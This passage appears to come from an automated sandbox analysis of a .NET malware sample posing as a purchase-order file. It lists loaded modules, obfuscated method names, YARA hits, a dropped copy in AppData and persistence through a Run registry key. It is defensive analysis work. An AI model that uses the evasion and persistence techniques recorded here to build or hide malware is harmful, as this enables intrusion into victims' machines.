                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003909000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1486633819.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.000000000304C000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1739735884.0000000003957000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003909000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1486633819.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.000000000304C000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1739735884.0000000003957000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, F8VZVLUPkb76WPMZ4nC.cs.Net Code: Type.GetTypeFromHandle(BsT7LxEsYZUK6W2v1Rg.IPyYDtsMjk(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(BsT7LxEsYZUK6W2v1Rg.IPyYDtsMjk(16777259)),Type.GetTypeFromHandle(BsT7LxEsYZUK6W2v1Rg.IPyYDtsMjk(16777263))})
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, Importer.cs.Net Code: CalcStub
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exe, WrapperOrderSpec.cs.Net Code: TestIdentifier System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5db0000.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5db0000.12.raw.unpack, ListDecorator.cs.Net Code: Read
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5db0000.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5db0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5db0000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                        Source: Yara matchFile source: 8.2.Xpnzea.exe.41e3250.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.Xpnzea.exe.4583250.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5d40000.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.41e3250.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1472676483.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1652064396.0000000004583000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1485671738.0000000005D40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1708492205.00000000028F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1627992334.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1739735884.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PO_9876563647-FLOWTRONIX (FT)UUE.exe PID: 2944, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Xpnzea.exe PID: 6876, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Xpnzea.exe PID: 4260, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C9E9ED push esi; iretd 0_2_05C9EAD1
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C9397B pushad ; retf 0_2_05C93981
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05C97B7B push esp; retf 0_2_05C97B81
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CA2E68 push eax; retf 0005h0_2_05CA2E5D
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CA0358 push es; retf 0005h0_2_05CA0666
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CA0353 push es; retf 0005h0_2_05CA0666
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CA2B1B push eax; retf 0005h0_2_05CA2E5D
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CA2B20 push eax; retf 0005h0_2_05CA2E5D
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05CC2020 pushfd ; retf 0_2_05CC2021
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_05EE3278 push esi; iretd 0_2_05EE327E
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeCode function: 0_2_06146E88 push E8000001h; iretd 0_2_06146E8D
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FF397B pushad ; retf 6_2_05FF3981
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_05FFEA6D push esi; iretd 6_2_05FFEAD1
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06002EA7 push esp; retf 6_2_06002EA8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06022020 pushfd ; retf 6_2_06022021
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06022FD0 push es; ret 6_2_06023080
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0618E498 push es; ret 6_2_0618E4BC
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06190C12 push es; ret 6_2_06190C20
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0619C545 push 280619C1h; ret 6_2_0619C565
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_0619C567 push 280619C1h; ret 6_2_0619C565
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_06243278 push esi; iretd 6_2_0624327E
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 6_2_064A6E88 push E8000001h; iretd 6_2_064A6E8D
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A5397B pushad ; retf 8_2_05A53981
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A5EA09 push esi; iretd 8_2_05A5EAD1
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A62EA7 push esp; retf 8_2_05A62EA8
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05A82020 pushfd ; retf 8_2_05A82021
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BFC566 push 2805BFC1h; ret 8_2_05BFC565
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05BFC54E push 2805BFC1h; ret 8_2_05BFC565
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05F06E88 push E8000001h; iretd 8_2_05F06E8D
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeCode function: 8_2_05F0160C push ds; ret 8_2_05F01613
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5b40000.10.raw.unpack, PWap1U04AlPoyGQsDeZ.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'bPo0ugy90I', 'NtProtectVirtualMemory', 'Ur7ro9OcsXC2RKBJi6c', 'K88BXWO10qKYUf3yq9U', 'mOF381OOeMyqMOZqDlZ', 'Kc3QtBOjgxeAxKTkvUc'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.5b40000.10.raw.unpack, ynNqgx095QFM02puHhI.csHigh entropy of concatenated method names: 'gKr0j3r8M0', 'fTNRn6OlcWBZXoMcX3S', 'KnnTkaORWx7YQcKMFaH', 'avvix6OhQ4aQROyhZJJ', 'LHCpVhO7KjGwpBxcfPe', 'wsF3USOGjPhKkYTxShE', 'qccfNCOHcIOd44YGvwY', 'XUT5bqOB6RltAcpwAxP'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, YbtbwRfTA7fyO09OhuA.csHigh entropy of concatenated method names: 'MM6fQvNiqx', 'beYf6c700U', 'zRiUXA388P', 'mdEKmW8M753xnIot0JQ', 'qyCYWP8ZJApkaPF4X5e', 'qahk258pUCNocErde47', 'euPjIH82XPN1uTXb3dj', 'xaqFus8sEkk3acYEBCF', 't01S0r89BMGK7B6U39N'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'mxwpxmDFIAHainh6GA6'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, YQDstTf9femEJ9x9cNt.csHigh entropy of concatenated method names: 'a3FfroEFHR', 'fm1fPXaYKI', 'nlg36PjX8SADrhyCrrJ', 'Jlicyrj3SgjaQ6MsmG2', 'scVih3jJu1KNV84mZiQ', 'dEBO6fjdtZqbpMIZvgY', 'jtLHmijyHh4oBNK1Au5', 'QD74pnjkDK0KCIH48Yu', 'RoHDAvj0fbqNhjVAWXc', 'LQCFaCjV67hgAQpfBip'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, rrhUpcofcEqO10LIFK.csHigh entropy of concatenated method names: 'zj1KCsPJs', 'Qd1x3vwjK', 'BEV4wsT4H', 'Sg0LvolH2', 'BkiNru0C7', 'j4PrOZSlmkkqllWRIDt', 'SR1p2FSRfDoelEtMETM', 'ea69E4ShyXwSgbD3uLc', 'QRvm8vS5COLOWwSPg0V', 'qHWFNdSmPqPNnWxKddW'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, TG5YQkE1UNMCogsZgYE.csHigh entropy of concatenated method names: 'GSWEtp7aeF', 'PGuEY7yuGy', 'xOVEAfQhFQ', 'OiYE7aTlTJ', 'WukEGjw9H6', 'yJHElZbs8Y', 'odyEREiGnH', 'C5uEhRYcVK', 'E8qE5uSfiL', 'IjEEmFErGF'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, fcjVvPf1n2QJ60Xrj71.csHigh entropy of concatenated method names: 'Ps3fcQlM2i', 'RpjY0SjPB0ycHFjC7ao', 'bAttrBj1daLd81piuZG', 'AKBJ6rjO8K92Jsnu4mT', 'jep1XijcRKeRcf0F5Zd', 'gvdEbsjjgy2YjoZGn4P', 'BjLwWTj8UC1a5wVekcK', 'q1JPqYjDFRbyfDKefME', 'bdj1gFjS1Hf2sv01NDg', 'GD9T4ijrr3wgijvjfMN'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, Ht0fUkf5mEwcRHByegY.csHigh entropy of concatenated method names: 'GTBfgWRJwg', 'cWXfwnjC6I', 'OQZfCMQAAp', 'B5fXOy8KCb07EInjllC', 'QKxvDW8xTZHuSmBDZC2', 'IwAT5d8eoCxHoe77l3b', 'yYTeXV8NkNxqxijLgDo', 'IWxWMn8WMH1qDtCVKxy', 'G4s2Sh84ieYw0u8E3Qu', 'Wg0WIb8LC5T5bujnxGC'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, mdncvaUULXNL3o2WjuR.csHigh entropy of concatenated method names: 'pTaUEhDHNk', 'cXHUowl57u', 'zZcdVo87nLfNWb8ojDW', 'hBUQNq8GfeywZsEm1U1', 'PF6Xgt8lt7eIa2eScPo', 'CRCZvN8Yn2OCmEXBdb0', 'CQfDgv8AwwbqKjs38dx', 'tHhfYH8RMjoDlyf76ey', 'puHwUg8hfY29eOO2Ll2', 'GFX0Z585ejwynQC9wuO'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, brEOsqUJCHwuJec7GGu.csHigh entropy of concatenated method names: 'ajIUygUMXK', 'jbS3Rh81FM59BPxPxc0', 'uwPRjw8OiAMYHAKrwAD', 'KZA8sY8ct1Dx2pxL9RX', 'K90m5L8jRWkiYHTEwGy', 'j5Zwd388gq8QKrffo8R', 'qT3D1m8Dnl3fx1UP8vh', 'hsqSZ28rrtkycpfyHNG', 'Wt2bQR8PMyVXbP9m3L7'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, KQ0O62flygUOwwEtWBN.csHigh entropy of concatenated method names: 'JsUfhYJ7tV', 'bHqAcc8k7KcJCWxYsV3', 'da9lpD80XFTWWXKQUqC', 'dTj9U18VyOSPQJA4s4m', 'C1FhCb8imdb2qvTlLqC', 'a1Rdri8fPadUDfLWmlL', 'v7UGmk8U9Sw02F4ZRHe', 'R4fMpo8bwXNE0Yl3Ync', 'NdytHU8EJ76cjw3jAI2', 'R7E4Ud8dYxwyY4AcHWG'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, PWap1U04AlPoyGQsDeZ.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'bPo0ugy90I', 'NtProtectVirtualMemory', 'Ur7ro9OcsXC2RKBJi6c', 'K88BXWO10qKYUf3yq9U', 'mOF381OOeMyqMOZqDlZ', 'Kc3QtBOjgxeAxKTkvUc'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, ynNqgx095QFM02puHhI.csHigh entropy of concatenated method names: 'gKr0j3r8M0', 'fTNRn6OlcWBZXoMcX3S', 'KnnTkaORWx7YQcKMFaH', 'avvix6OhQ4aQROyhZJJ', 'LHCpVhO7KjGwpBxcfPe', 'wsF3USOGjPhKkYTxShE', 'qccfNCOHcIOd44YGvwY', 'XUT5bqOB6RltAcpwAxP'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, gBpZs3Ue6w5ef2oUcN3.csHigh entropy of concatenated method names: 'NSxUKr8nOT', 'bC2UqIDdbCWS1NLs6q6', 'Y4r9sQDydM3kaejRXnG', 'Tx16MODkPIsGBo3nl5H', 'nqy5ggD0RZPkbuiM1kv', 'vhCTmdDVPdmvXl4B9Kk', 'VIRh9nDiRuiqCMqb8Ud', 'CrOEGEDfPmTQjiraTvl', 'd6hf1FD3Jva8yKo8Kih', 'B25HSODJVE6FxgbSeiL'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, T8ZYbHUxb33ReWabDWG.csHigh entropy of concatenated method names: 'sh3U4s9VPx', 'lrmULF1ioh', 'WDSyuSDoVpYQHCIf2dw', 'rvM5UpDeMihgIkPD9fn', 'iaiU2pDNvl9Ns9rRYOe', 'XK9pMVDbj35T6mWoAhr', 'ryvcrODE5xsAyZ7KTxC', 'pRbwJ0DKrNpa56WFxIN', 'OcXVZdDxN1wpUPvrV0P', 'V4QSjZDWZ0pBukBMsqT'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, NCbdhHJWLiR24qNMBX0.csHigh entropy of concatenated method names: 'pygJLBurnm', 'Y8b83drcn0JhRDSVjuw', 'uV54GTrjdNC1HP4D3Ui', 'jHDFNrr8dOQHAha41Cu', 'R6gB8brDVDIxXfhOa9K', 'hLR0LkrqOFS4ao5tLuI', 'C4Ahlgrvo2XaJAaOf9k', 'xpPJVSrFEpVZNGfDmbq', 'EdZaFUrHHG53uJ6yHDJ', 'f3xHFrrBoJTOqIK5BMa'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, ePs1mBkcEyfJ8TAtT2T.csHigh entropy of concatenated method names: 'xQLk8S7L6n', 'PemkDNxYI0', 'i5QkqMcLug', 'cH31GD1OCMOChQDkuDw', 'fcp2Sa1cCUyl1fVlydu', 'suPsFP1jXaPAfRwnKIO', 'xStrDw18yVr42LIODZ8', 'IQkCop1POtsVyDnMpSI', 'yZEynD11IhcunvtC2Fr', 'ftsidO1DSZ9fLD2ONt5'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, Q2sg51Ukkc0H5RkMMtZ.csHigh entropy of concatenated method names: 'iVbUV44BKe', 'jTXUiRJJ1Q', 'IwIFHG8HYXp8sxDQ6C7', 'tku0A08B6Nii21IwVwC', 'LrjqNE8vUCHmerXR1T2', 'h1UuBj8FS9ls6XUDfxd', 'PZERw48nBSKIol3LZdi'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, V7s2ZpEgNJRPQQ0SkgY.csHigh entropy of concatenated method names: 'rvC4W9XpvL', 'x8r44T7tGc', 'iYn4L3quDR', 'PLH4uMthJQ', 'PFm4pUapL5', 'Evs42Hg3De', 'PcX4M2uBPH', 'nDMoxXoeW9', 'WLl4Z7Joa4', 'qjY4slZGwk'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, atSpPjfnFXMaVbP3paE.csHigh entropy of concatenated method names: 'upVfYHBjxL', 'syI0ZljRONTFox15fX6', 'EphTJwjhFR2MefG6Vd7', 'axlKavj5YFOFKY4dCIi', 'PXZhn8jmSNlo3GKEnGa', 'bBUgAIjgZiB1OcUTfnD', 'drHNAWjCDnFygMGTKEw', 'hJjfndjwENWGouWASYj', 'CXNZacjIoy5UI9RXOko', 'T9H94SjTMBMbrkQvRm7'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, F8VZVLUPkb76WPMZ4nC.csHigh entropy of concatenated method names: 'CnYHFBqLEAQf6lViakI', 'WYvgF2quU5Ard3fHsl8', 'sSxEy08lhp', 'wFVfUSqZgpbcJPM3jTV', 'gai3nFqsJjK5Rrx9sHF', 'aSRnkiq9dcvFBwi98k7', 'p33Dr5qSNDDK4cS4MaB', 'MSN0FmqrZpcEI03qPVH', 'hVMEENqPspVr7Y1x15G', 'ikdRQAq1NjkLqw8vs1M'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, jyHLig03GbeGTp1tgyp.csHigh entropy of concatenated method names: 'Lm80dQAohg', 'wpn0kqBnLi', 'LhE0VxpIfE', 'MSf0fLCjte', 'pR00UK0pr9', 'M8n0bw7CZV', 'wLH0EyybvB', 'wA50oNDWlU', 'M0N0eju0LM', 'ATt0NpTmc5'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, QaLSAjfMxyDIYodqKd0.csHigh entropy of concatenated method names: 'lTKfsQKndC', 'svMdMkcIRUEaDh0x3t3', 'cc6CPucTlOYfcjpRR3h', 'I8J4GNcaV6TZATiTQtg', 'lZlBj4cQf9ZMi1kak2F', 'jF53gpc6KCo0QmPiyT8', 'JDkohVcCdpBDPO44NQY', 'IjIcUEcwBiMbqGiBr81'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, iVay2ZksSq6AL3cYeAG.csHigh entropy of concatenated method names: 'mhrkSbQUKr', 'zFlkrb8PTP', 'Uh3kPXyQgq', 'Kxfk1ml5FX', 'cuekODgfkw', 'fpGtTMPIE4ECYD37aS3', 'AGZZa2PTnHGeUgJqH7x', 'eBPyGhPay4078Hcm2WV', 'cOj8M0PQjQGfee96o2v', 'FJYEMKP6yXZIRs8JxWU'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, yI15OhMwaKnD9LWXIu.csHigh entropy of concatenated method names: 'prXsLq1dZ', 'ANZ97fVx4', 'vlXrRpZSB', 'p6lSvWo9v', 'Tc5wg2SaneLfqmBQS0g', 'EGdYsPSQvbATEmqS4XN', 'gUj3tfS6qeApEOn6KGa', 'vBikmRSz0tOA55CsCJc', 'NXjUTRrXX7IWcnpGXlx', 'nryRTTSID18easuyLxV'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, aBeQQmfjm2CxkGbWUFW.csHigh entropy of concatenated method names: 'sx6fvoqmZi', 'WsgfFhqnuq', 'FpAfDvX06n', 'AknfqBvL25', 'Xtvp6pjHddesL43Kofk', 'tmnwOWjBNncgk8J7Pap', 'PMqeEQjn7rVuuNJsfO7', 'R50QCFjtJIWwadabkbE', 'Wuueb8jYWvYu3IDLNPd', 'PP6jNyjAXhqdmYaQYIY'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, pD0QF3Us5tqm4WgmIGm.csHigh entropy of concatenated method names: 'Hs0YcSgjy1', 'wHcM3RqUedZjFLTZwBg', 'popKKmqbiDnbnWrBRj3', 'gaQb6OqEJEp327ecOMN', 'nagctPqoXL9jQLRWHEY', 'Ophlc1qiiXatUoQTpR2', 'NRN4u4qf5nhb3Kk8dJT', 'BqWK3wqerCkNsCaRKOt', 'MK9yLuqNfW5ZlpHs3lG'
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeFile created: C:\Users\user\AppData\Roaming\Xpnzea.exeJump to dropped file
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XpnzeaJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XpnzeaJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
